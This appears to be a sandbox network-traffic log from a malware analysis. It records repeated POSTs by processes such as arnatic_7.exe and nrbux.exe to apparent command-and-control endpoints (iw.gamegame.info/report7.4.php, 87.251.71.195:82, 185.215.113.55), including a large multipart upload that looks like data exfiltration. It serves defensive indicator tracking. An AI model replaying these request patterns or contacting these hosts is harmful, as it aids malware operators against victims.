SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:17:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07ad8c6a00001e611f3b3000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0hB8MhhXSI67Abx5r5Ybr6XkKUeCDxXfpMGMXZfPWp%2BDdfuZiVcpkkgwGJimlkboiFEZijAWYOUb%2B1xWkqtjyEEbDCNTrntZDXEK%2F9OWBsTEGM9prb4EhvsX9op8AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686185a4dc61e61-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://87.251.71.195:82/
arnatic_7.exe
Remote address: 87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:17:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07adb5df00007cdc499c8000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9QnfdOnF7JS4DKO7hUvHnEClyt7dajrXefC7Fh1zeO2CaglAUX1wwFT1BtPGcc5STofSjDGFrcTc0mQTx10VzHQrOPj9ad%2FWND0qKmIEZzdMDjWWlTa4QZyNjavdBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686189c9bb87cdc-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:17:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07addec00000416863989000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kdgDxNOcBOhP0gq2nYPhwJ4niLCuFDjy9Ib1AiAZkvWYrlgFJA4NbEBQS04aaU01RzYuDU9QVQTX6jofk9GWtYsZpbct2T0oyhdWAibqD%2Bbke5y73UHV9XMcd0E3mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668618de0d924168-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        any.edge.bing.com
                                                                                                                                                                                        any.edge.bing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        204.79.197.200
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        go.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        go.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        go.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        go.microsoft.com.edgekey.net
                                                                                                                                                                                        go.microsoft.com.edgekey.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        e11290.dspg.akamaiedge.net
                                                                                                                                                                                        e11290.dspg.akamaiedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        23.66.21.99
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        e13678.dscb.akamaiedge.net
                                                                                                                                                                                        e13678.dscb.akamaiedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        95.100.186.52
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        a-0001.a-afdentry.net.trafficmanager.net
                                                                                                                                                                                        a-0001.a-afdentry.net.trafficmanager.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        www-bing-com.dual-a-0001.a-msedge.net
                                                                                                                                                                                        www-bing-com.dual-a-0001.a-msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        dual-a-0001.a-msedge.net
                                                                                                                                                                                        dual-a-0001.a-msedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        204.79.197.200
                                                                                                                                                                                        dual-a-0001.a-msedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        13.107.21.200
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.bing.com/cortanaassist/rules?cc=US&version=6
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        204.79.197.200:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
                                                                                                                                                                                        host: www.bing.com
                                                                                                                                                                                        accept: */*
                                                                                                                                                                                        accept-encoding: gzip, deflate, br
                                                                                                                                                                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                                                                                                                        dnt: 1
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/2.0 404
                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                        content-length: 38996
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-encoding: br
                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                        p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                                                                                        set-cookie: MUID=348E364F7850603323FE262779AA61AE; domain=.bing.com; expires=Wed, 27-Jul-2022 07:18:01 GMT; path=/; secure; SameSite=None
                                                                                                                                                                                        set-cookie: MUIDB=348E364F7850603323FE262779AA61AE; expires=Wed, 27-Jul-2022 07:18:01 GMT; path=/; HttpOnly
                                                                                                                                                                                        set-cookie: _EDGE_S=F=1&SID=2AC13AA3B84C63830AA72ACBB9B6622F&mkt=en-us; domain=.bing.com; path=/; HttpOnly
                                                                                                                                                                                        set-cookie: _EDGE_V=1; domain=.bing.com; expires=Wed, 27-Jul-2022 07:18:01 GMT; path=/; HttpOnly
                                                                                                                                                                                        set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: SRCHUID=V=2&GUID=3EC0BC3226644BD4A2CF79BE618C7FA9&dmnchg=1; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: SRCHUSR=DOB=20210702; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: _SS=SID=2AC13AA3B84C63830AA72ACBB9B6622F; domain=.bing.com; path=/
                                                                                                                                                                                        x-snr-routing: 1
                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        x-error-page: 404-custom
                                                                                                                                                                                        x-ua-compatible: IE=edge
                                                                                                                                                                                        x-cache: CONFIG_NOCACHE
                                                                                                                                                                                        x-msedge-ref: Ref A: CEE3573C0F334C8FBC644ABD26FC1C56 Ref B: BUH01EDGE0414 Ref C: 2021-07-02T07:18:01Z
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
  arnatic_7.exe
  Remote address:
  87.251.71.195:82
  Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
  Host: 87.251.71.195:82
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:18:06 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07ae07de0000fd05409a0000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mYvR9fCRphDB6nz84p5RFU2fr5vgi8pd6gyDH44E%2BmumsW%2Bdo4DQifiheFX1KE%2BCJ54hc1Cnxubc63LCSN2ELhlbhxYSi4fN90vzlXHHdBApkTf%2Bw7q4%2B8p32Hexlg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 6686191fca2afd05-OTP
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST
  http://185.215.113.55/t5BnOoke2/index.php
  nrbux.exe
  Remote address:
  185.215.113.55:80
  Request
  POST /t5BnOoke2/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.55
  Content-Length: 84
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:18:15 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 6
  Content-Type: text/html; charset=UTF-8
• flag-unknown
  POST
  http://185.215.113.55/t5BnOoke2/index.php?scr=1
  nrbux.exe
  Remote address:
  185.215.113.55:80
  Request
  POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
  Content-Type: multipart/form-data; boundary=----fac0658007086c8b8875231aa8edf853
  Host: 185.215.113.55
  Content-Length: 89441
  Cache-Control: no-cache
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:18:16 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07ae328600001649ad9d3000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uq3wiZy%2B45IJ6RofSZTElPxWzGIwf8%2FNoZsSuDaNFf5fc7ZdVSqxPadvmr%2B9rcIduEKlBYMxDizGPpy7VV6e8u2v7g%2FpY2VvcRkyOVcOal3Wr5Std%2BSq5mpRop%2Fc8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66861964095f1649-MUC
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:18:27 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07ae5b3a00000d46931df000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gGB00Tz1sfeWS8QjWWcZwBD1zzi8awCOpQWiaZgEj6Q%2BMNAmEfOAaNZigohTR%2BkTmBfiTB4kU%2BniZATXuIguQo2O0uYNeMiP0uh7egKirHnQPRvP7g4mmQSwyP0qZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 668619a529050d46-ARN
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:18:37 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ae836e0000d443be05c000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Xl5fbKmsBv8%2FABbPIM3yOm%2Fy2G%2BVQsuh4%2BaCJvr48gW%2FCxcoE0Ax3LSVBzrEouINXoyqM%2FK8h2LNW6MSRbFKxasYomKMRrNf75Ezn%2BKZP5ul8rLggGiO2g9rg9WJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668619e57ec1d443-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:47 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aeab6200001bd518aff000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=QCbXB6Xk5nMRglYbIFZJnGBXsxuyTdJKLE8%2BsQPVSxzFiMyW4Xpu0UEemxHX3O4HwhYyDhZhyWx%2Ff4v9VgSKHtwFMu4ACyKYAZAUcc0nmhzQfUzb2gS3rAh%2FRbthJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861a2569a21bd5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:58 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aed49800007251598b5000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=1k2MJvUtHKmk38Kq5JKrNBH2a2NDZFj3d54zQ5scOzI4BvRfApZzBheymXzLrK82C%2FmX95YI%2BDNDa5my%2FphlxuD1F%2B9z3QnSFTSlboS%2B8vCn%2FGXG2rwhcAl6%2BP9uzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861a675c0e7251-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:09 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07aefe0300001649e0bff000000001
